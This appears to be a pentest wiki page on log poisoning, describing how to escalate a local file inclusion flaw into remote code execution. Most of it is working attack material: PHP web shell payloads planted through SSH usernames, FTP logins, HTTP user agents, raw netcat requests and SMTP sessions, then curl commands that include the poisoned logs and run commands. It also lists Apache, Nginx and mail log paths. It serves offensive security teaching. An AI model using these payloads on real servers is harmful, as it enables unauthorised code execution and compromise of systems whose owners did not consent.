Infiltr8ForumGitHub

Logs Poisoning

Theory

Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server log.

Practice

If you use double quotes for the shell instead of simple quotes, the double quotes will be modified for the string "quote;", PHP will throw an error there and nothing else will be executed

make sure you write correctly the payload or PHP will error every time it tries to load the log file and you won't have a second opportunity.

/var/log/auth.log

We can try to log in with SSH using a crafted login. On a Linux system, the login will be echoed in /var/log/auth.log. By exploiting a Local File Inclusion, the attacker will be able to make the crafted login echoed in this file interpreted by the server.

# Sending the payload via SSH
ssh '<?php phpinfo(); ?>'@$TARGET

# Accessing the log file via LFI
curl --user-agent "PENTEST" $URL/?parameter=/var/log/auth.log&cmd=id
/var/log/vsftpd.log

When the FTP service is available, testers can try to access the /var/log/vsftpd.log and see if any content is displayed. If that's the case, log poisoning may be possible by connecting via FTP and trying to login setting the PHP payload in the username and then access the logs using the LFI.

# Sending the payload via FTP
ftp $TARGET_IP
> '<?php system($_GET['cmd'])?>'

# Accessing the log file via LFI
curl --user-agent "PENTEST" $URL/?parameter=/var/log/vsftpd.log&cmd=id
Apache/Nginx access.log

When the web application is using an Apache2 or Nginx server, the access.log may be accessible using an LFI.

# Sending the payload in user agent via curl
curl --user-agent "<?php passthru(\$_GET['cmd']); ?>" $URL

# Accessing the log file via LFI
curl $URL/?parameter=/var/log/apache2/access.log&cmd=id

You may find the access.log files on the following locations, for more locations you may use one of this wordlists:

# APACHE LOG FILE
## RHEL/Red Hat/CentOS/Fedora
/var/log/httpd/access_log

## Debian/Ubuntu
/var/log/apache2/access.log
/var/log/apache/access.log
/usr/local/apache2/log/access.log
/usr/local/apache/log/access.log

## FreeBSD
/var/log/httpd-access.log

## Windows
C:\xampp\apache\logs\access.log

# NGINX LOG FILE
## Linux
/var/log/nginx/access.log

## Windows
C:\nginx\logs\access.log
Apache/Nginx error.log

This one is similar to the access.log, but instead of putting simple requests in the log file, it will put errors in error.log.

As the /<?php passthru($_GET['cmd']); ?> page doesn't exist, it will be logged to the error.log

# Sending the payload via netcat (avoid url encoding)
nc $TARGET_IP $TARGET_PORT
> GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
> Host: $TARGET_IP
> Connection: close

# Accessing the log file via LFI
curl $URL/?parameter=/var/log/apache2/error.log&cmd=id

You may find the access.log files on the following locations, for more locations you may use one of this wordlists:

# APACHE LOG FILE
## RHEL/Red Hat/CentOS/Fedora
/var/log/httpd/error_log

## Debian/Ubuntu
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache2/log/error.log
/usr/local/apache/log/error.log

## FreeBSD
/var/log/httpd-error.log

## Windows
C:\xampp\apache\logs\access.log

# NGINX LOG FILE
## Linux
/var/log/nginx/error.log

## Windows
C:\nginx\logs\error.log
Email Logs

When an SMTP server is running and writing logs in /var/log/mail.log, it's possible to inject a payload using telnet (as an example).

# Sending the payload via telnet
telnet $TARGET_IP $TARGET_PORT*
> HELO $DOMAIN
> MAIL FROM:<[email protected]>
> RCPT TO:<?php system($_GET['cmd']); ?>

# Accessing the log file via LFI
curl "$URL/?parameter=/var/log/mail.log&cmd=id"

Alternatively, send a mail to a internal account (user@localhost) containing your PHP payload

# Sending the payload via telnet
telnet $TARGET_IP $TARGET_PORT
> HELO localhost
> MAIL FROM:<[email protected]>
> RCPT TO:<www-data@localhost>
> DATA
> subject: RCE
> <?php system($_GET['cmd']); ?>
> .

# Accessing the log file via LFI
curl "$URL/?parameter=/var/spool/mail/www-data&cmd=id"

References

LogoFile Inclusion/Path traversalHackTricks
Logologs poisoningThe Hacker Recipes
LogoRCE via LFI Log Poisoning - The Death PotionMedium

Last updated

Was this helpful?